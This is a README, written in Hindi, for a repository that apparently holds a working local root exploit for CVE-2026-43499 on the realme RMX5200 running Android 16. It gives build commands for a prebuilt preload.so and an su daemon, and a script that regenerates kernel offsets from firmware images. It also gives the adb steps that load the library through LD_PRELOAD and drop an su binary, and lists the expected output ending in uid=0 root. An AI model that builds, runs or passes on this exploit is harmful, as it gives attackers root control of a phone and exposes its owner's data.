
Android 16 पर realme RMX5200 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण जो LD_PRELOAD-आधारित preload.so श्रृंखला का उपयोग करके CVE-2026-43499 के माध्यम से अस्थायी रूट पहुंच प्राप्त करता है।
CVE-2026-43499 स्थानीय विशेषाधिकार वृद्धि SO के लिए:
| आइटम | मान |
|---|---|
| उपकरण | realme RMX5200 / RE6030L1 |
| एंड्रॉइड | 16 |
| कर्नेल | 6.12.23-android16-5-gb2a876903b49-ab14541642-4k |
| फ़िंगरप्रिंट | realme/RMX5200/RE6030L1:16/BP2A.250605.015/...:user/release-keys |
पूर्व-निर्मित बाइनरी: bin/preload.so
यह रिपॉजिटरी केवल SO बिल्ड ट्री रखता है (स्रोत + ऑफसेट + पूर्व-निर्मित)। कोई ब्राउज़र हार्नेस नहीं, कोई फ़र्मवेयर डंप नहीं, कोई परीक्षण स्कैफ़ोल्डिंग नहीं।
सार्वजनिक IonStack / popsicle-शैली श्रृंखला पर आधारित; ऑफसेट इस उपकरण के boot.img + xbl_config.img से पुनर्जीवित।
.
├── bin/preload.so # prebuilt aarch64 shared object (verified)
├── generate_target.py # optional: regenerate target.h from boot+xbl
├── source/
│ ├── Makefile
│ └── src/
│ ├── target.h # RMX5200 offsets
│ ├── main.c preload.c slide.c ...
│ └── kernelsnitch/
└── README.md
आवश्यकताएँ:
llvm-objdump (केवल यदि target.h पुनर्जीवित कर रहे हों)# Linux NDK example
export NDK_ROOT=/path/to/android-ndk
make -C source clean preload
# Windows NDK example
make -C source clean preload \
NDK_ROOT="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018" \
NDK_TOOLCHAIN="/c/Users/YOU/AppData/Local/Android/Sdk/ndk/27.2.12479018/toolchains/llvm/prebuilt/windows-x86_64"
आउटपुट:
source/build/bin/preload.so
cd source
mkdir -p build/bin build/embed
CC="$NDK_TOOLCHAIN/bin/aarch64-linux-android35-clang"
$CC -O2 -Isrc -fPIE -pie -DTARGET_CONFIG_H=\"target.h\" \
src/su_daemon.c -o build/embed/su_daemon_aarch64_pie
$CC -O2 -Isrc -fPIC -Wno-unused-parameter -Wno-sign-compare -Wno-unused-function \
-DTARGET_CONFIG_H=\"target.h\" \
src/main.c src/util.c src/slide.c src/fops.c src/pipe.c \
src/preload.c src/su_blob.S \
-shared -o build/bin/preload.so -pthread
मैचिंग फ़र्मवेयर इमेज की आवश्यकता है (यहाँ शामिल नहीं हैं):
python3 generate_target.py \
--boot boot.img \
--xbl-config xbl_config.img \
--llvm-objdump llvm-objdump \
-o source/src/target.h
adb push bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
इस preload.so को Firefox-151 lonStack-शैली होस्ट (जैसे Rootme डिवाइस प्रविष्टि) के माध्यम से लोड करें। इस रिपॉजिटरी में शामिल नहीं है।
सफलता संकेतक:
slide-kaslr-ok
direct credential result uid=0 ...
local su binary ready path=/data/local/tmp/su
direct-root-summary root=1 ...
uid=0(root) gid=0(root) ... context=kernel
target.h/पुनर्निर्माण की आवश्यकता है।preload.so श्रृंखला